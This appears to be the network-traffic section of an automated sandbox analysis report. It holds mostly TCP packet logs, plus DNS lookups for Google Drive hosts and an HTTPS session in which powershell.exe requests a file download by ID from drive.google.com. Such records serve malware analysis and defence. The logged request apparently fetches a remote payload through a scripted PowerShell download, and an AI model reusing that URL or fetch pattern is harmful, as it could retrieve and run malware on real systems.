                                      Oct 1, 2024 07:47:22.624042988 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.624053955 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.624083042 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.624119997 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.624124050 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.624166965 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.624577999 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.624620914 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.628869057 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.628920078 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.628925085 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.628972054 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.628976107 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.628994942 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.629014969 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.629017115 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.629025936 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.629045010 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.629081964 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.632838011 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.632884979 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.632889032 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.632898092 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.632930994 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.632961035 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.632963896 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.633007050 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.633074045 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.633116961 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.633121014 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.633161068 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.633209944 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.633253098 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.637437105 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.637499094 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.637502909 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.637542009 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.637547970 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.637583971 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.637587070 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.637629986 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.637635946 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.637674093 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.643738985 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.643778086 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.643812895 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.643843889 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.643846989 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.643853903 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.643874884 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.643910885 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.644107103 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.644140005 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.644145966 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.644182920 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.647695065 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.647741079 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.647783041 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.647814989 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.647818089 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.647859097 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.647862911 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.647897959 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.647901058 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.647941113 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.647948027 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.647980928 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.652947903 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.653000116 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.653090954 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.653135061 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.653167009 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.653193951 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.653271914 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.653276920 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.653312922 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.659517050 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.659574986 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.659643888 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.659676075 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.659681082 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.659693003 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.659708023 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.659723997 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.659735918 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.659739971 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.659763098 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.659790039 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.664195061 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.664247036 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.664354086 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.664392948 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.664397955 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.664412975 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.664431095 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.664433956 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.664446115 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.664469957 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.664473057 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.664504051 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.669214010 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.669275999 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.669281960 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.669317007 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.669490099 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.669522047 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.669529915 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.669538975 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.669549942 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.669576883 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.669579983 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.669614077 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.674695969 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.674765110 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.674772024 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.674809933 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.674833059 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.674866915 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.674871922 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.674906969 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.675041914 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.675081968 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.675086975 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.675127029 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.679752111 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.679809093 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.679815054 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.679855108 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.679917097 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.679949999 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.679951906 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.679959059 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.679991007 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.682517052 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.682569981 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.684376955 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.684422970 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.684427977 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.684463024 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.684794903 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.684838057 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.684921026 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.684964895 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.685133934 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.685177088 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.688641071 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.688707113 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.688710928 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.688755035 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.688823938 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.688858986 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.688863039 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.688878059 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.688893080 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.688898087 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.688911915 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.688945055 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.693521023 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.693553925 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.693583012 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.693588018 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.693609953 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.693629980 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.693635941 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.693639994 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.693670034 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.693696022 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.694025993 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.694070101 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.701301098 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.701339006 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.701353073 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.701359034 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.701373100 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.701375961 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.701404095 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.701407909 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.701435089 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.701467991 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.701471090 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.701512098 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.711142063 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.711179972 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.711205006 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.711222887 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.711224079 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.711230993 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.711246967 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.711287975 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.711293936 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.711333990 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.716123104 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.716173887 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.716239929 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.716285944 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.716504097 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.716540098 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.716545105 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.716562986 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.716578007 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.716582060 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.716593027 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.716623068 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.720371962 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.720432997 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.720438004 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.720477104 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.720509052 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.720546961 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.720551968 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.720582962 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.720695019 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.720732927 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.720736980 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.720773935 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.725114107 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.725148916 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.725172043 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.725178957 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.725195885 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.725233078 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.725409031 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.725445032 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.725449085 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.725452900 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.725472927 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.725501060 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.730694056 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.730734110 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.730736971 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.730742931 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.730767012 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.730771065 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.730779886 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.730801105 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.730822086 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.731077909 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.731116056 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.734280109 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.734321117 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.734324932 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.734333038 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.734359980 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.734364986 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.734402895 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.734405994 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.734440088 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.740904093 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.740982056 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.741173029 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.741218090 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.741224051 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.741264105 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.741897106 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.741938114 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.742038965 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.742077112 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.742213964 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.742253065 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.746793985 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.746840000 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.746841908 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.746848106 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.746897936 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.746902943 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.746942997 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.746947050 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.746993065 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.747076035 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.747114897 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.751008034 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.751056910 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.751064062 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.751070976 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.751095057 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.751128912 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.751132011 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.751180887 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.751297951 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.751337051 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.751342058 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.751386881 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.756428003 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.756489038 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.756494045 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.756501913 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.756522894 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.756546974 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.756550074 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.756553888 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.756575108 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.756606102 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.756608963 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.756644011 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.761671066 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.761729002 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.761929035 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.762021065 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.762095928 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.762166023 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.762181997 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.762192965 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.762224913 CEST49710443192.168.2.9142.250.185.97

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 1, 2024 07:46:42.414438963 CEST5235353192.168.2.91.1.1.1
                                      Oct 1, 2024 07:46:42.421252966 CEST53523531.1.1.1192.168.2.9
                                      Oct 1, 2024 07:46:43.474085093 CEST6148953192.168.2.91.1.1.1
                                      Oct 1, 2024 07:46:43.481461048 CEST53614891.1.1.1192.168.2.9

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 1, 2024 07:46:42.414438963 CEST192.168.2.91.1.1.10x7664Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                      Oct 1, 2024 07:46:43.474085093 CEST192.168.2.91.1.1.10x4b05Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 1, 2024 07:46:42.421252966 CEST1.1.1.1192.168.2.90x7664No error (0)drive.google.com216.58.206.78A (IP address)IN (0x0001)false
                                      Oct 1, 2024 07:46:43.481461048 CEST1.1.1.1192.168.2.90x4b05No error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • drive.google.com
                                      • drive.usercontent.google.com

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.949706216.58.206.784437796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-01 05:46:43 UTC215OUTGET /uc?export=download&id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7 HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:46:43 UTC1610INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 01 Oct 2024 05:46:43 GMT
                                      Location: https://drive.usercontent.google.com/download?id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy: script-src 'nonce-tzhSJ6tsFVi4sIizOVOfqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
